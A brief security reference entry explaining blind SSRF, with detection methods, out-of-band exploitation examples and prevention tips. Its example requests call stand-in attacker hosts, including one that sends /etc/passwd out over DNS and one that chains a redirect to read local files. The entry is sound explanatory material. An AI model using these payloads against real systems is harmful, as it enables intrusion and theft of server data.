Blind SSRF

Blind SSRF occurs when an application is vulnerable to SSRF but the response from the forged request is not returned to the attacker. The attacker must use indirect methods to confirm the vulnerability and extract data.

How It Works

Unlike regular SSRF where responses are visible, blind SSRF requires alternative channels. Attackers use timing differences, out-of-band callbacks, or observable side effects to infer results.

Detection Techniques

// Out-of-band detection with callback
GET /fetch?url=http://attacker-controlled.com/callback

// DNS-based detection
GET /fetch?url=http://uniqueid.attacker.com/

// Timing-based (internal vs external response time)
GET /fetch?url=http://192.168.1.1/  -- fast if internal exists
GET /fetch?url=http://192.168.1.2/  -- timeout if doesn't exist

Exploitation via Out-of-Band

// Exfiltrate data via DNS
GET /fetch?url=http://$(cat /etc/passwd | base64).attacker.com/

// Redirect-based chaining
GET /fetch?url=http://attacker.com/redirect?to=file:///etc/passwd

// Exploiting internal services that trigger callbacks
GET /fetch?url=http://internal-webhook-service/trigger

Common Scenarios

• Webhook configurations
• PDF/document generators
• Image processing services
• URL validation endpoints

Prevention

• Same as regular SSRF prevention
• Disable external callbacks where possible
• Monitor for unusual outbound connections

See Also

• Server-Side Request Forgery (SSRF)
• Out-of-Band SQL Injection
• Blind XXE